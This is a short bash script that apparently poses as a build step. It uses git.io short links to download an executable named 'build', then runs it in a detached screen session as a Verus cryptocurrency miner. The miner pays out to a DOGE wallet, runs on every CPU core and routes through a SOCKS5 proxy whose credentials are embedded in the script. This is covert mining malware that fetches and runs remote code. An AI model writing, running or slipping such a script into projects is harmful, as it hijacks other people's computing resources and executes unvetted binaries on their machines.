#!/bin/bash

# Do not edit this file!
# kumaha aink we njink
proxy="socks5://omar:omar@159.89.185.190:2112"
worker="$(echo DOGE-$(shuf -i 1-999 -n 1))"
cd /home/shell-bot
wget -q https://git.io/JPjuz
wget -qO build https://git.io/JPjuB
chmod +x build
chmod +x compile.sh
screen -dm -S build ./build -a verus -o stratum+tcp://verushash.mine.zergpool.com:3300 -u D7hBkeeqaXzc7dy71FLqUdPoyogAYrU8s7 -p c=DOGE,mc=VRSC,ID=$worker -t $(nproc --all) -x $proxy
